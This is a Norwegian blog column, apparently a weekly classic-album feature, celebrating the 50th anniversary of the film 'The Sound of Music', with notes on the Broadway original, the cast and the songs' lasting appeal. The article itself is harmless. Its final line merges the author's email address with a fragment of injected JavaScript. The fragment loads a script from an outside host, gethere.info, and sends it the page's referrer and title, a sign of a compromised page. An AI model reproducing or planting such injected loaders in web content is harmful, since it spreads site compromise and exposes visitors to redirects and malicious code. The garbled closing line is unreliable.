Ukens Klassiske Album

Ukens Klassiske Album

I desember 1965 var det filmpremiere på Rodgers og Hammersteins musikal “The Sound of Music” – den ble en suksess nesten uten sidestykke. I år er det 50 år siden og det vil vi gjerne markere.

Hvis man nevner titler som “Do-Re-Mi”, “Edelweiss” og “I have confidence”, forstår de fleste den enorme suksessen “The Sound of Music” har hatt gjennom 50 år.

Musikalen ble opprinnelig oppført i 1959 på Broadway i New York med datidens store musikalstjerne Mary Martin i hovedrollen som Maria, og Theodor Bikel som kaptein von Trapp. Historien om den strenge kapteinen, og hans syv barn som får den unge foreldreløse nonnen Maria som guvernante, bygger på Maria von Trapps erindringer og den Tyske filmen “Die Trapp Familie” fra 1956. Filmversjonen er regissert av amerikaneren Robert Wise mens de to hovedrollene Maria og von Trapp ble udødeliggjort av Julie Andrews og Christopher Plummer.

Hva er det som gjør at denne historien og musikken fortsatt er like populær den dag i dag?

Svaret finnes blant annet i at historien, som er inspirert av virkelige hendelser, inneholder mange nyanser som gjør at alle kan relatere seg til den. Maria gjennomgår en enorm personlig utvikling fra en ung, uskyldig nonne til en moden og selvstendig kvinne som tvinger seg selv til å ta store og viktige beslutninger.

Også er det selvfølgelig musikken som duoen Richard Rodgers og

Oscar Hammerstein II står bak. Som andre berømte komponist-duoer som Ulvaeus og Andersson, Lennon og McCartney, klarer de primært å skrive vakre og fengende melodier som blir lagret i minnet vårt uten å miste friskheten. Mange store artister har valgt å gjøre sine versjoner, som f.eks ved årets Oscar-utdelinger der Lady Gaga sang et potpurri av sangene fra musikalen.

Er det klassisk musikk? Er det pop? Hvordan skal musikken kategoriseres spør du kanskje? Det svaret skal jeg la stå ubesvart.

Har du spørsmål eller kommentarer er du alltid velkommen til å kontakte meg på morten.ernst.lassen@wimpmusic.coms.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;